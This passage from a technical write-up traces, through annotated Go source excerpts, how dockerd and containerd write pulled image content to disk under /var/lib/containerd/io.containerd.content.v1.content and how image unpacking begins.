        <span class="n">ref</span><span class="o">:</span>    <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span>
        <span class="n">client</span><span class="o">:</span> <span class="n">wrclient</span><span class="p">,</span>
        <span class="n">offset</span><span class="o">:</span> <span class="n">offset</span><span class="p">,</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Copy()</code> writes file by calling <code class="language-plaintext highlighter-rouge">copyWithBuffer()</code> and saves file by calling <code class="language-plaintext highlighter-rouge">cw.Commit()</code>. Both functions send the request with data content to <code class="language-plaintext highlighter-rouge">containerd</code>. Take <code class="language-plaintext highlighter-rouge">copyWithBuffer()</code> as an example: it sends action <code class="language-plaintext highlighter-rouge">WriteAction_WRITE</code> with data attached [3] in the end.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/content/helpers.go</span>
<span class="k">func</span> <span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cw</span> <span class="n">Writer</span><span class="p">,</span> <span class="n">or</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">Opt</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">copied</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">copyWithBuffer</span><span class="p">(</span><span class="n">cw</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cw</span><span class="o">.</span><span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">expected</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">copyWithBuffer</span><span class="p">(</span><span class="n">dst</span> <span class="n">io</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="n">src</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">)</span> <span class="p">(</span><span class="n">written</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">nr</span><span class="p">,</span> <span class="n">er</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadAtLeast</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">))</span> <span class="c">// read from src</span>
        <span class="k">if</span> <span class="n">nr</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
            <span class="n">nw</span><span class="p">,</span> <span class="n">ew</span> <span class="o">:=</span> <span class="n">dst</span><span class="o">.</span><span class="n">Write</span><span class="p">(</span><span class="n">buf</span><span class="p">[</span><span class="m">0</span><span class="o">:</span><span class="n">nr</span><span class="p">])</span>  <span class="c">// &lt;-------- write to dst</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_writer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">rw</span> <span class="o">*</span><span class="n">remoteWriter</span><span class="p">)</span> <span class="n">Write</span><span class="p">(</span><span class="n">p</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">)</span> <span class="p">(</span><span class="n">n</span> <span class="kt">int</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">const</span> <span class="n">maxBufferSize</span> <span class="o">=</span> <span class="n">defaults</span><span class="o">.</span><span class="n">DefaultMaxSendMsgSize</span> <span class="o">&gt;&gt;</span> <span class="m">1</span>
    <span class="k">for</span> <span class="n">data</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">slices</span><span class="o">.</span><span class="n">Chunk</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">maxBufferSize</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">offset</span> <span class="o">:=</span> <span class="n">rw</span><span class="o">.</span><span class="n">offset</span>

        <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rw</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="o">&amp;</span><span class="n">contentapi</span><span class="o">.</span><span class="n">WriteContentRequest</span><span class="p">{</span>
            <span class="n">Action</span><span class="o">:</span> <span class="n">contentapi</span><span class="o">.</span><span class="n">WriteAction_WRITE</span><span class="p">,</span> <span class="c">// [3]</span>
            <span class="n">Offset</span><span class="o">:</span> <span class="n">offset</span><span class="p">,</span>
            <span class="n">Data</span><span class="o">:</span>   <span class="n">data</span><span class="p">,</span>
        <span class="p">})</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">n</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, the content server’s <code class="language-plaintext highlighter-rouge">Write()</code> handles both WRITE and COMMIT actions. If the request is a COMMIT action, <code class="language-plaintext highlighter-rouge">wr.Commit()</code> is called [4] to save data into the filesystem.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterContentServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/content/v1/content_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterContentServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">ContentServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Content_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">Content_ServiceDesc</span> <span class="o">=</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">Streams</span><span class="o">:</span> <span class="p">[]</span><span class="n">grpc</span><span class="o">.</span><span class="n">StreamDesc</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="p">{</span>
            <span class="n">StreamName</span><span class="o">:</span>    <span class="s">"Write"</span><span class="p">,</span>
            <span class="n">Handler</span><span class="o">:</span>       <span class="n">_Content_Write_Handler</span><span class="p">,</span> <span class="c">// &lt;--------</span>
            <span class="n">ServerStreams</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
            <span class="n">ClientStreams</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
        <span class="p">},</span>
    <span class="p">},</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">_Content_Write_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">stream</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServerStream</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">ContentServer</span><span class="p">)</span><span class="o">.</span><span class="n">Write</span><span class="p">(</span><span class="o">&amp;</span><span class="n">contentWriteServer</span><span class="p">{</span><span class="n">stream</span><span class="p">})</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Write</span><span class="p">(</span><span class="n">session</span> <span class="n">api</span><span class="o">.</span><span class="n">Content_WriteServer</span><span class="p">)</span> <span class="p">(</span><span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">wr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">store</span><span class="o">.</span><span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span>
        <span class="n">content</span><span class="o">.</span><span class="n">WithRef</span><span class="p">(</span><span class="n">ref</span><span class="p">),</span>
        <span class="n">content</span><span class="o">.</span><span class="n">WithDescriptor</span><span class="p">(</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span><span class="n">Size</span><span class="o">:</span> <span class="n">total</span><span class="p">,</span> <span class="n">Digest</span><span class="o">:</span> <span class="n">expected</span><span class="p">}))</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">msg</span><span class="o">.</span><span class="n">Action</span> <span class="o">=</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span>
        <span class="k">switch</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_WRITE</span><span class="p">,</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_COMMIT</span><span class="o">:</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="n">req</span><span class="o">.</span><span class="n">Action</span> <span class="o">==</span> <span class="n">api</span><span class="o">.</span><span class="n">WriteAction_COMMIT</span> <span class="p">{</span>
                <span class="c">// [...]</span>
                <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">wr</span><span class="o">.</span><span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">total</span><span class="p">,</span> <span class="n">expected</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [4]</span>
                    <span class="c">// [...]</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The data being written is kept in a temporary file in the <code class="language-plaintext highlighter-rouge">"ingest/"</code> directory, and when receiving a COMMIT action, <code class="language-plaintext highlighter-rouge">Commit()</code> renames it to the destination path [5], which is inside the <code class="language-plaintext highlighter-rouge">"blobs/"</code> directory.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/writer.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">w</span> <span class="o">*</span><span class="n">writer</span><span class="p">)</span> <span class="n">Commit</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">dgst</span> <span class="o">:=</span> <span class="n">w</span><span class="o">.</span><span class="n">digester</span><span class="o">.</span><span class="n">Digest</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">ingest</span>    <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">w</span><span class="o">.</span><span class="n">path</span><span class="p">,</span> <span class="s">"data"</span><span class="p">)</span> <span class="c">// ingest/&lt;hash(ref)&gt;/data</span>
        <span class="n">target</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">w</span><span class="o">.</span><span class="n">s</span><span class="o">.</span><span class="n">blobPath</span><span class="p">(</span><span class="n">dgst</span><span class="p">)</span>            <span class="c">// blobs/sha256/&lt;dgst&gt;</span>
    <span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Rename</span><span class="p">(</span><span class="n">ingest</span><span class="p">,</span> <span class="n">target</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The writer object (<code class="language-plaintext highlighter-rouge">w</code>) decides the root directory in which to save the file, and it is initialized in <code class="language-plaintext highlighter-rouge">writer()</code> [6].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">store</span><span class="p">)</span> <span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">w</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">w</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">store</span><span class="p">)</span> <span class="n">writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">total</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">expected</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">path</span><span class="p">,</span> <span class="n">refp</span><span class="p">,</span> <span class="n">data</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">ingestPaths</span><span class="p">(</span><span class="n">ref</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">writer</span><span class="p">{</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
        <span class="n">ref</span><span class="o">:</span>       <span class="n">ref</span><span class="p">,</span>
        <span class="n">path</span><span class="o">:</span>      <span class="n">path</span><span class="p">,</span>
        <span class="c">// [...]</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To get the full path, we have to look at the <code class="language-plaintext highlighter-rouge">containerd</code> source code.</p>

<p><code class="language-plaintext highlighter-rouge">containerd</code> decouples functionalities into <strong>different plugin objects</strong>. A plugin’s <code class="language-plaintext highlighter-rouge">init()</code> function defines its ID and initialization callback. Here, the ID of the content plugin is <code class="language-plaintext highlighter-rouge">"content"</code> [7], and its callback function internally sets the root directory property as its store root [8].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/content/local/plugin/plugin.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="n">Type</span><span class="o">:</span> <span class="n">plugins</span><span class="o">.</span><span class="n">ContentPlugin</span><span class="p">,</span>
        <span class="n">ID</span><span class="o">:</span>   <span class="s">"content"</span><span class="p">,</span> <span class="c">// [7]</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">root</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">Properties</span><span class="p">[</span><span class="n">plugins</span><span class="o">.</span><span class="n">PropertyRootDir</span><span class="p">]</span>
            <span class="n">ic</span><span class="o">.</span><span class="n">Meta</span><span class="o">.</span><span class="n">Exports</span><span class="p">[</span><span class="s">"root"</span><span class="p">]</span> <span class="o">=</span> <span class="n">root</span>
            <span class="k">return</span> <span class="n">local</span><span class="o">.</span><span class="n">NewStore</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.go</span>
<span class="k">func</span> <span class="n">NewStore</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">NewLabeledStore</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">NewLabeledStore</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">ls</span> <span class="n">LabelStore</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">s</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">store</span><span class="p">{</span>
        <span class="n">root</span><span class="o">:</span>               <span class="n">root</span><span class="p">,</span> <span class="c">// [8]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So where is <code class="language-plaintext highlighter-rouge">plugins.PropertyRootDir</code> defined? When starting the <code class="language-plaintext highlighter-rouge">containerd</code> daemon, <code class="language-plaintext highlighter-rouge">New()</code> iterates through the loaded plugins [9]. It further creates a context for each plugin object and sets <code class="language-plaintext highlighter-rouge">plugins.PropertyRootDir</code> [10]. By default, <code class="language-plaintext highlighter-rouge">config.Root</code> is set to <strong><code class="language-plaintext highlighter-rouge">/var/lib/containerd</code></strong>, and <code class="language-plaintext highlighter-rouge">id</code> is from the <code class="language-plaintext highlighter-rouge">URL()</code> function.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/server/server.go</span>
<span class="k">func</span> <span class="n">New</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">srvconfig</span><span class="o">.</span><span class="n">Config</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">Server</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">loaded</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">LoadPlugins</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">p</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">loaded</span> <span class="p">{</span> <span class="c">// [9]</span>
        <span class="n">id</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">URI</span><span class="p">()</span>
        <span class="c">// [...]</span>
        <span class="n">initContext</span> <span class="o">:=</span> <span class="n">plugin</span><span class="o">.</span><span class="n">NewContext</span><span class="p">(</span>
            <span class="n">ctx</span><span class="p">,</span>
            <span class="n">initialized</span><span class="p">,</span>
            <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">{</span>
                <span class="n">plugins</span><span class="o">.</span><span class="n">PropertyRootDir</span><span class="o">:</span>      <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Root</span><span class="p">,</span> <span class="n">id</span><span class="p">),</span> <span class="c">// [10]</span>
                <span class="c">// [...]</span>
            <span class="p">},</span>
        <span class="p">)</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// defaults/defaults_unix.go</span>
<span class="k">const</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">DefaultRootDir</span> <span class="o">=</span> <span class="s">"/var/lib/containerd"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">URL()</code> concatenates the plugin’s type string, which is <code class="language-plaintext highlighter-rouge">"io.containerd.content.v1"</code> here, and its ID, which is <code class="language-plaintext highlighter-rouge">"content"</code> here. So finally, we know those image files are stored <strong>inside the directory <code class="language-plaintext highlighter-rouge">/var/lib/containerd/io.containerd.content.v1.content</code></strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/plugin/plugin.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">Registration</span><span class="p">)</span> <span class="n">URI</span><span class="p">()</span> <span class="kt">string</span> <span class="p">{</span>
    <span class="c">// r.Type.String() == "io.containerd.content.v1"</span>
    <span class="c">// r.ID</span>
    <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">Type</span><span class="o">.</span><span class="n">String</span><span class="p">()</span> <span class="o">+</span> <span class="s">"."</span> <span class="o">+</span> <span class="n">r</span><span class="o">.</span><span class="n">ID</span>
<span class="p">}</span>

<span class="c">// plugins/types.go</span>
<span class="k">const</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">ContentPlugin</span> <span class="n">plugin</span><span class="o">.</span><span class="n">Type</span> <span class="o">=</span> <span class="s">"io.containerd.content.v1"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>
</code></pre></div></div>

<p>List the directory and you’ll find the image blobs.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@aaa:~# <span class="nb">ls</span> <span class="nt">-al</span> /var/lib/containerd/io.containerd.content.v1.content/
total 16
drwxr-xr-x  4 root root 4096 May 27 11:47 <span class="nb">.</span>
drwx------ 13 root root 4096 Apr  9 14:51 ..
drwxr-xr-x  3 root root 4096 Apr  9 14:51 blobs
drwxr-xr-x  2 root root 4096 May 28 10:49 ingest
</code></pre></div></div>

<h2 id="2-unpack-an-image">2. Unpack an Image</h2>

<h3 id="21-dockerd-side">2.1. dockerd side</h3>

<p>The unpacker is used as a wrapper of chained image handlers [1], so it is triggered before handles run. When triggered, the <code class="language-plaintext highlighter-rouge">unpacker.Unpack()</code> is called [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">RemoteOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">Image</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">pullCtx</span><span class="o">.</span><span class="n">Unpack</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">unpacker</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">unpack</span><span class="o">.</span><span class="n">NewUnpacker</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">ContentStore</span><span class="p">(),</span> <span class="n">uopts</span><span class="o">...</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">pullCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span> <span class="o">=</span> <span class="k">func</span><span class="p">(</span><span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="n">unpacker</span><span class="o">.</span><span class="n">Unpack</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="c">// [2]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pullCtx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="o">.</span><span class="n">Image</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">handler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">Handlers</span><span class="p">(</span><span class="n">handlers</span><span class="o">...</span><span class="p">)</span>
    <span class="c">// [...]</span>
    
    <span class="k">if</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="n">handler</span> <span class="o">=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span><span class="p">(</span><span class="n">handler</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">desc</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the handlers finish, <code class="language-plaintext highlighter-rouge">Unpack()</code> gets the sub-descriptors [3]. If the descriptor is a manifest [4], it splits sub-descriptors to two types: <strong>layer</strong> and <strong>non-layer</strong>. Later, the layer list is assigned to the non-layer sub-descriptor [5].</p>

<p>For a config descriptor, the layers are retrieved and unpacked [6].</p>

<p>One thing that should be mentioned is that the returned children of a manifest descriptor only <strong>contain non-layer sub-descriptors</strong> [7], so these layers are not downloaded <strong>until <code class="language-plaintext highlighter-rouge">u.unpack()</code> is called</strong>.</p>

